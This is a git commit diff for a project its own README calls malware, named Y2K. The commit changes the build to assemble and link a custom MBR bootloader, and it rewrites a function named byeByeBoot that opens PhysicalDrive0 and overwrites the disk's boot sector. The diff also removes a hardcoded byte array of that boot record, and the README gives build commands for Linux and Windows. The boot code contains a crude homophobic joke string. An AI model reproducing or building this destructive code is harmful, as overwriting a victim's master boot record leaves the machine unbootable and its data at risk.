Add dynamic bootloader compilation
This commit is contained in:
parent
0b4cc4f6b6
commit
51b7464f02
|
@ -1,4 +1,5 @@
|
|||
bin/
|
||||
bin/*.exe
|
||||
res/*.o
|
||||
bootloader/*.bin
|
||||
mbr/*.bin
|
||||
mbr/*.o
|
||||
|
|
8
Makefile
8
Makefile
|
@ -1,6 +1,8 @@
|
|||
.PHONY: all clean
|
||||
|
||||
CXX := i686-w64-mingw32-g++
|
||||
LD := i686-w64-mingw32-ld
|
||||
NASM := nasm
|
||||
WINDRES := i686-w64-mingw32-windres
|
||||
|
||||
SRC := $(wildcard src/*)
|
||||
|
@ -10,8 +12,10 @@ all: main
|
|||
main: $(BIN)
|
||||
@mkdir -p bin
|
||||
$(WINDRES) -o res/resource.o res/resource.rc
|
||||
$(CXX) $(SRC) res/resource.o -static -l gdi32 -l winmm -o bin/Y2K
|
||||
$(NASM) -o mbr/bootloader.bin mbr/bootloader.asm
|
||||
$(LD) -r -b binary -o mbr/bootloader.o mbr/bootloader.bin
|
||||
$(CXX) $(SRC) res/resource.o mbr/bootloader.o -static -l gdi32 -l winmm -o bin/Y2K
|
||||
|
||||
clean:
|
||||
@echo "Cleaning up..."
|
||||
@rm -fr bin/* res/*.o bootloader/*.bin
|
||||
@rm -fr bin/* res/*.o mbr/*.bin mbr/*.o
|
||||
|
|
18
README.org
18
README.org
|
@ -11,38 +11,42 @@ To run this malware you need a Windows XP macchine with date set to <2000-01-01>
|
|||
You will need *MinGW* and *Make*. You can parse the
|
||||
argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and
|
||||
the =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~).
|
||||
You can change the =CXX= and =WINDRES= to ~x86_64-wi64-mingw-g++~ and ~x86_64-wi64-mingw-windres~ respectively to build it natively for 64bit envioriments.
|
||||
Others arguments are =NASM= and =LD= for changing the nasm and ld commands.
|
||||
You can change the =CXX= and =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~ and ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64bit envioriments.
|
||||
|
||||
*** Arch linux:
|
||||
|
||||
#+BEGIN_SRC shell
|
||||
pacman -S mingw-w64 make
|
||||
pacman -S make mingw-w64 nasm
|
||||
make
|
||||
#+END_SRC
|
||||
|
||||
*** Ubuntu
|
||||
|
||||
#+BEGIN_SRC shell
|
||||
apt install mingw-w64 make
|
||||
apt install make mingw-w64 nasm
|
||||
make
|
||||
#+END_SRC
|
||||
|
||||
|
||||
You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= files on folder =bootloader/=.
|
||||
You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= and =.o= files on folder =mbr/=.
|
||||
|
||||
** On Windows
|
||||
|
||||
You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler.
|
||||
You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler
|
||||
and [[https://nasm.us/][NASM]].
|
||||
Then run the command:
|
||||
|
||||
#+BEGIN_SRC batch
|
||||
windres -o res\resource.o res\resource.rc
|
||||
g++ src\* res\resource.o -static -l gdi32 -l winmm -o Y2K
|
||||
nasm -o mbr\bootloader.bin mbr\bootloader.asm
|
||||
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
|
||||
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
|
||||
#+END_SRC
|
||||
|
||||
* Bootloader
|
||||
|
||||
This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code and building instructions for the binaies can be found [[src/bootloader/][here]].
|
||||
This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found [[src/mbr/][here]].
|
||||
|
||||
* Payloads
|
||||
|
||||
|
|
|
@ -2,6 +2,5 @@
|
|||
|
||||
This is the bootloader source code of Y2K. to build run ~nasm bootloader.asm -o bootloader.bin~
|
||||
|
||||
You can execute the ~python getHex.py bootloader.bin~ to get the formated bootloader bytes plus
|
||||
the size of the generated array and put it in the bootloader contant in =src/payloads.h= alongside
|
||||
with the printed size.
|
||||
You need to execute ~ld -r -b binary -o bootloader.o bootloader.bin~ to create the object file used to
|
||||
compile the code.
|
||||
|
|
|
@ -120,8 +120,8 @@ eternal:
|
|||
|
||||
|
||||
; Set cursor position
|
||||
; dl - Columns - x
|
||||
; dh - Rows - y
|
||||
; dl Columns x
|
||||
; dh Rows y
|
||||
cursor:
|
||||
cli
|
||||
mov ah, 0x2
|
||||
|
@ -130,7 +130,7 @@ cursor:
|
|||
ret
|
||||
|
||||
; Print some gay string
|
||||
; si - string
|
||||
; si string
|
||||
print:
|
||||
cli
|
||||
mov bl, 0x21
|
||||
|
@ -144,7 +144,7 @@ print:
|
|||
ret
|
||||
|
||||
; Delay
|
||||
; cx - delay value in microsseconds
|
||||
; cx delay value in microsseconds
|
||||
sleep:
|
||||
cli
|
||||
mov ah, 0x86
|
||||
|
@ -162,5 +162,5 @@ easter3 db "I really hate this mbr payload.", 0
|
|||
easter4 db "You're very gay. B)", 0
|
||||
|
||||
|
||||
times 510 - ($-$$) db 0 ; Fill the file with 0 510 times'
|
||||
times 510 - ($-$$) db 0 ; Fill the file with 0 510 times
|
||||
dw 0xAA55 ; Magic number used by BIOS to identify the file
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
from sys import argv, exit as exitc
|
||||
|
||||
if len(argv) > 2:
|
||||
print('Please inform just one file!')
|
||||
exitc(2)
|
||||
|
||||
elif len(argv) != 2:
|
||||
print('Plase inform a file!')
|
||||
exitc(3)
|
||||
|
||||
try:
|
||||
file = open(argv[1], 'rb')
|
||||
|
||||
except FileNotFoundError:
|
||||
print('The specified file was not found!')
|
||||
exitc(4)
|
||||
|
||||
content = file.read()
|
||||
file.close()
|
||||
|
||||
for i in range(len(content)):
|
||||
if i%12 == 0:
|
||||
print('')
|
||||
|
||||
print(format(content[i], '#04x'), end='')
|
||||
|
||||
if i != len(content)-1:
|
||||
print(', ', end='')
|
||||
|
||||
print('\nSize:', len(content))
|
|
@ -2,6 +2,9 @@
|
|||
#include "payloads.h"
|
||||
#include "bytebeats.h"
|
||||
|
||||
extern char binary_mbr_bootloader_bin_start[];
|
||||
extern char binary_mbr_bootloader_bin_end[];
|
||||
|
||||
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
|
||||
|
||||
HANDLE t1, t2, t3, t4;
|
||||
|
@ -19,7 +22,11 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
|
|||
PlaySound(MAKEINTRESOURCE(2), hInstance, SND_RESOURCE);
|
||||
ExitProcess(0);
|
||||
case 2:
|
||||
Payloads::byeByeBoot();
|
||||
Payloads::byeByeBoot((unsigned int)
|
||||
(binary_mbr_bootloader_bin_end -
|
||||
binary_mbr_bootloader_bin_start),
|
||||
binary_mbr_bootloader_bin_start,
|
||||
binary_mbr_bootloader_bin_end);
|
||||
break;
|
||||
case 3:
|
||||
ExitProcess(0);
|
||||
|
|
|
@ -47,57 +47,22 @@ namespace Payloads {
|
|||
return 3;
|
||||
}
|
||||
|
||||
void byeByeBoot(){
|
||||
const unsigned char bootloader[512] = {
|
||||
0xFA, 0x68, 0x00, 0xA0, 0x07, 0x31, 0xFF, 0xB8, 0x13, 0x00, 0xCD, 0x10,
|
||||
0xB9, 0x15, 0x00, 0xE8, 0xB8, 0x00, 0xBE, 0xD3, 0x7C, 0xB2, 0x0C, 0xB6,
|
||||
0x0A, 0xE8, 0x97, 0x00, 0xE8, 0x9C, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0xA5,
|
||||
0x00, 0xBE, 0xE3, 0x7C, 0xB2, 0x06, 0xB6, 0x0C, 0xE8, 0x84, 0x00, 0xE8,
|
||||
0x89, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0x92, 0x00, 0x30, 0xD2, 0x30, 0xF6,
|
||||
0xE8, 0x74, 0x00, 0xBE, 0x01, 0x7D, 0xB3, 0x07, 0xB4, 0x0E, 0xAC, 0xCD,
|
||||
0x10, 0x08, 0xC0, 0x75, 0xF7, 0x80, 0xC2, 0x10, 0xE8, 0x60, 0x00, 0x30,
|
||||
0xE4, 0xCD, 0x16, 0x3C, 0x08, 0x74, 0x34, 0x3C, 0x0D, 0x74, 0x27, 0x80,
|
||||
0xFA, 0x27, 0x7D, 0x22, 0x3C, 0x1B, 0x74, 0x2E, 0x3C, 0x36, 0x74, 0x2F,
|
||||
0x3C, 0x39, 0x74, 0x30, 0x3C, 0x09, 0x74, 0x31, 0xB4, 0x0A, 0x30, 0xFF,
|
||||
0xB3, 0x0F, 0xB9, 0x01, 0x00, 0xCD, 0x10, 0xFE, 0xC2, 0xE8, 0x2F, 0x00,
|
||||
0xEB, 0xCD, 0x30, 0xD2, 0xFE, 0xC6, 0xE8, 0x26, 0x00, 0xEB, 0xC4, 0xFE,
|
||||
0xCA, 0xE8, 0x1F, 0x00, 0xEB, 0xBD, 0xBE, 0x12, 0x7D, 0xEB, 0x0D, 0xBE,
|
||||
0x2D, 0x7D, 0xEB, 0x08, 0xBE, 0x48, 0x7D, 0xEB, 0x03, 0xBE, 0x68, 0x7D,
|
||||
0x30, 0xD2, 0x30, 0xF6, 0xE8, 0x04, 0x00, 0xE8, 0x09, 0x00, 0xF4, 0xFA,
|
||||
0xB4, 0x02, 0xB7, 0x00, 0xCD, 0x10, 0xC3, 0xFA, 0xB3, 0x21, 0xB4, 0x0E,
|
||||
0xAC, 0xFE, 0xC3, 0xCD, 0x10, 0x08, 0xC0, 0x75, 0xF5, 0xC3, 0xFA, 0xB4,
|
||||
0x86, 0xBA, 0x00, 0x00, 0xCD, 0x15, 0xC3, 0x48, 0x61, 0x70, 0x70, 0x79,
|
||||
0x20, 0x6E, 0x65, 0x77, 0x20, 0x59, 0x65, 0x61, 0x72, 0x21, 0x00, 0x45,
|
||||
0x6E, 0x6A, 0x6F, 0x79, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x75, 0x73,
|
||||
0x65, 0x6C, 0x65, 0x73, 0x73, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61,
|
||||
0x64, 0x2E, 0x2E, 0x2E, 0x00, 0x54, 0x79, 0x70, 0x65, 0x20, 0x73, 0x6F,
|
||||
0x6D, 0x65, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x3A, 0x20, 0x00, 0x59, 0x6F,
|
||||
0x75, 0x20, 0x66, 0x69, 0x6E, 0x64, 0x20, 0x61, 0x20, 0x45, 0x61, 0x73,
|
||||
0x74, 0x65, 0x72, 0x45, 0x67, 0x67, 0x2C, 0x20, 0x4F, 0x4D, 0x47, 0x21,
|
||||
0x00, 0x54, 0x68, 0x69, 0x73, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x69,
|
||||
0x73, 0x20, 0x73, 0x6F, 0x20, 0x62, 0x75, 0x67, 0x67, 0x79, 0x2E, 0x20,
|
||||
0x3E, 0x3A, 0x43, 0x00, 0x49, 0x20, 0x72, 0x65, 0x61, 0x6C, 0x6C, 0x79,
|
||||
0x20, 0x68, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6D,
|
||||
0x62, 0x72, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x00,
|
||||
0x59, 0x6F, 0x75, 0x27, 0x72, 0x65, 0x20, 0x76, 0x65, 0x72, 0x79, 0x20,
|
||||
0x67, 0x61, 0x79, 0x2E, 0x20, 0x42, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
|
||||
};
|
||||
void byeByeBoot(int size,char* start,char* end){
|
||||
unsigned char bootloader[size];
|
||||
int index = 0;
|
||||
for(char* i = start; i != end; ++i) {
|
||||
bootloader[index] = *i;
|
||||
index++;
|
||||
}
|
||||
|
||||
DWORD bWriten;
|
||||
|
||||
HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"), GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
|
||||
WriteFile(mbr, bootloader, 512, &bWriten, NULL);
|
||||
HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"),
|
||||
GENERIC_ALL,
|
||||
FILE_SHARE_READ | FILE_SHARE_WRITE,
|
||||
0, OPEN_EXISTING, 0, 0);
|
||||
|
||||
WriteFile(mbr, bootloader, size, &bWriten, NULL);
|
||||
CloseHandle(mbr);
|
||||
}
|
||||
|
||||
|
|
Loading…
Reference in New Issue